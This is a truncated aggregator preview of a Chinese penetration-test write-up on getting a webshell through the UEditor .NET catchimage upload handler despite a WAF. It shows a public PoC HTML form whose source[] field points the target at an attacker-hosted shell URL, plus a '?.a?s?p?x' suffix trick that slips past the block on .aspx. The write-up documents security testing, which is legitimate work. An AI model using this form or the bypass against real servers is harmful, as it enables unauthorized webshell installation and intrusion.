今天看啥  ›  专栏  ›  黑白之道

攻防|记一次Ueditor上传Bypass

黑白之道  · 公众号  · 互联网安全  · 2024-07-13 08:52

文章预览

原文首发在先知社区 https://xz.aliyun.com/t/15011 前言 前一段时间和小伙伴在某内网进行渗透测试,目标不给加白,只能进行硬刚了,队友 fscan 一把梭发现某资产疑似存在Ueditor组件,但初步测试是存在waf和杀软的,无法进行getshell,经过一番折腾最终getshell,文笔粗劣,大佬勿喷。 测试 看这返回内容, Ueditor 实锤了,采用公开的POC进行尝试,由于是纯内网无法进行出网,直接本机电脑开启Web服务,充当VPS提供Shell地址 http://xx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx < form action = "http://xxx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx? action=catchimage" enctype = "application/x-www-form-urlencoded" method = "POST" > < p > shell addr: < input type = "text" name = "source[]" /> p > < input type = "submit" value = "Submit" /> form > 从访问日志可以看出是 ?.a?s?p?x 后缀,因为直接采用 ?.aspx 直接被重置 看到这 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览